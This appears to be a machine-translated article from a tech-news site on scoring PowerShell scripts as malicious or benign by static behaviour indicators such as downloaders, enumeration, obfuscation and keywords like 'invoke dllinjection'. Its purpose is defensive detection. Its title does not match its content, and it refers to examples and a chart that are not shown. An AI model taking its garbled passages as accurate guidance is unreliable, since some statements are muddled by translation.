Shulou(Shulou.com)05/31 Report--

This article will explain in detail the common confusing methods of hiding data in powershell scripts. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

Define behavior in powershell

Before we discuss design and concepts, we need to define "behavior" in this context. Powershell is a Microsoft scripting language, and powershell also interprets and executes native Windows command line and dotnet code. For example, the following three lines in the powershell script produce the same output, even if they are three different calling methods.

Get-Date # PowerShell cmdletdate # Command-line native Windows application [System.DateTime]:: Now # dotNET

This flexibility makes analysis more difficult because we need to explain multiple ways to express the same thing.

When describing a behavior, it is not necessarily a variation of any command or command. For example, the "get-date" cmdlet might be an "enumeration" behavior because it is retrieving data related to the host system running the script. Similarly, the dotnet class "new object system.net.webclient.downloadfile" can be grouped as a "downloader" behavior, because it will be used to retrieve files remotely.

Dynamic and static analysis

Script behaviors need to be clearly identified, but sometimes they are not enough to determine whether the script is benign or malicious. How these behaviors are used is a key factor in determining. So how do we infer the intention? Here are two examples that look similar on the surface and show the same behavior: "downloader", "sleeps", "enumeration" and "one liner".

Before dynamic malware analysis comes into view, static viewing of files is the main way to determine whether there is malicious behavior in the sample. With the passage of time and the development of dynamic analysis, more and more industries turn to tool environment, products and defense response strategies, focusing on the dynamic rather than static properties of malicious files. Dynamic analysis provides a lot of information, and the resources, technology and time invested in this process are greatly reduced, so behavior analysis has become the dominant force.

If an powershell script downloads and executes another script, enumerating system information, using compression and a lot of base64, the analyst's first thought may be that it is malicious because these are the daily behaviors of dynamically analyzing malware. But in the example below, it's just a powershell script that displays the animation.

Determine the intention

To determine the intention, you need to establish a "basic fact" and grade the script. To do this, you need to manually analyze thousands of benign and malicious powershell scripts in the real world, marking them benign or malicious, respectively. When a known malicious script falls below the set threshold, you need to focus on improving the accuracy of the rest of the samples. The process of manual classification has access to all conceivable scripts-a variety of administrative and bootstrap scripts.

After classifying the sample set, the intention problem can be solved more perfectly. As you look at the script and start analyzing the behavior, you also need to consider the weight of the behavior and its relationship to the overall intent of the script.

For example, a script that only downloads and executes executables is less likely to be malicious when it generates logs at the same time or when the code is well-structured compared to a script that behaves in the same way but uses obfuscation and is fully contained on one line. Similarly, once a behavior is identified, its distribution in benign and malicious scripts can be observed. You also need to observe some "rare" behavior in the script and adjust the score weight accordingly.

Identifying important behaviors and figuring out how to score them properly is at the heart of this analysis. Once the behavior is created and the score is assigned, we can create a risk gradient scale to which we can map each sample, find an "best point" and begin to make more fine adjustments. The following chart describes the criteria levels used as static scoring risks in powershell scripts.

Set the score for malicious scripts at around 6.0, below this threshold, the risk will be reduced.

Things to consider.

Finally, the following points need to be considered:

PowerShell is a very flexible language. It provides a variety of ways to invoke the same functionality and ultimately cannot capture everything statically, especially if a malicious script author tries to circumvent detection. Sometimes some identification behavior indicators are missed, and in these cases, the policy chooses to be cautious, allowing these malicious scripts to score below the threshold, rather than paying too much attention to certain behaviors that cause benign scripts to score too high.

Another phenomenon in the analysis process is that benign scripts are usually independent because they are completely independent and can be run without parameters or dependencies; malicious scripts are usually a small part of a large puzzle and occupy a smaller piece of the puzzle.

No matter how big or small the script behavior is when trying to build the behavior, when a function-based behavior fails, I can still use context ("invoke dllinjection") keywords or metadata (such as character frequency analysis) as my behavior model to influence the score.

You also need to consider hiding behavior. Therefore, if you can clearly see the malicious url in the content of the script, but you can't recognize how it downloaded the load from url, you can still infer that the script has an unknown download behavior. These inferred behaviors are a good basis for further search and analysis.

This is the end of this article on "what are the common confusing ways to hide data in powershell scripts?" I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.